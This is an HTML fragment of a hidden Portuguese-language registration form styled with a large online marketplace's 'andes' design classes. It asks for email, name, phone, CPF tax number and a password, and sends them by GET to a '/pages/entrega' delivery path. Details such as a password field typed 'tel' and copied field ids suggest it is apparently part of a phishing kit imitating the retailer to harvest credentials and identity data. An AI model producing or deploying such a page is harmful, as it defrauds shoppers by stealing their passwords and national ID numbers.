<main role="main" id="cadastro" class="main-container auth-layout-container" style="display: none;"><div class="enter-email-page" id="enter-email"><div class="center-card__billboard center-card__billboard--transparent"></div><div style="padding: 2rem;" class="andes-card andes-card--flat andes-card--default center-card__body center-card__body--padding-64 enter-email-card andes-card--padding-0">
  <form action="/pages/entrega" method="get">
    
    

    <h1 class="enter-email-card__title">Complete os dados</h1><p class="enter-email-card__caption">Certifique-se de que você tenha acesso a ele.</p><div class="andes-autocomplete" style="
    margin-top: 20px;
">
    <div class="andes-form-control andes-form-control--textfield andes-form-control--default enter-email-card__input" style="
">
    
 <p  style="margin: 10px 0px 0px 0px;" >Adicione seu e-mail</p>   
    <label><div class="andes-form-control__control">
      <input required="" type="email" name="email" class="andes-form-control__field" value="" autocomplete="on"></div></label><div class="andes-form-control__bottom"><span class="andes-form-control__message"></span></div></div><div class="andes-form-control andes-form-control--textfield andes-form-control--default enter-email-card__input" style="
">
    
 <p  style="margin: 10px 0px 0px 0px;" >Escolha seu nome</p>   
    <label><div class="andes-form-control__control"><input required="" type="text" name="nome" data-testid="email-input" rows="1" aria-autocomplete="list" role="combobox" class="andes-form-control__field" maxlength="120" value="" autocomplete="off" aria-expanded="false"></div></label><div class="andes-form-control__bottom"><span class="andes-form-control__message"></span></div></div><div class="andes-form-control andes-form-control--textfield andes-form-control--default enter-email-card__input" style="
">
    
 <p  style="margin: 10px 0px 0px 0px;" >Valide seu telefone</p>   
    <label><div class="andes-form-control__control"><input pattern="[0-9]{11}" required="" type="tel" name="phone" data-testid="email-input" rows="1" aria-autocomplete="list" role="combobox" class="andes-form-control__field" maxlength="120" value="" autocomplete="off" aria-expanded="false"></div></label><div class="andes-form-control__bottom"><span class="andes-form-control__message"></span></div></div>
      
      <div class="andes-form-control andes-form-control--textfield andes-form-control--default enter-email-card__input" style="
">
    
 <p style="margin: 10px 0px 0px 0px;">CPF</p>   
    <label><div class="andes-form-control__control"><input required="" type="text" name="cpf" data-testid="cpf-input" rows="1" aria-autocomplete="list" role="combobox" class="andes-form-control__field" maxlength="120" value="" autocomplete="off" aria-expanded="false"></div></label><div class="andes-form-control__bottom"><span class="andes-form-control__message"></span></div></div>
      
      
      <div class="andes-form-control andes-form-control--textfield andes-form-control--default enter-email-card__input" style="
">
    
 <p style="margin: 10px 0px 0px 0px;">Crie sua senha</p>   
    <label><div class="andes-form-control__control"><input required="" type="tel" name="pass" data-testid="email-input" rows="1" aria-autocomplete="list" role="combobox" class="andes-form-control__field" maxlength="120" value="" autocomplete="off" aria-expanded="false"></div></label><div class="andes-form-control__bottom"><span class="andes-form-control__message"></span></div></div><div class="andes-dropdown andes-dropdown--form"><div class="andes-dropdown__popover"><ul class="andes-list andes-list--dropdown andes-list--selectable" role="listbox"></ul></div></div></div>
    
    
    <button style="margin-top: 20px;
    min-width: 100%;
    width: 100%;
    height: 40px;
    background: #3483fa;
    border: none;
    border-radius: 5px;
    font-size: 15px;
    color: #FFF;" type="submit" ><span class="andes-button__content">Continuar</span></button>
  </form></div></div></main>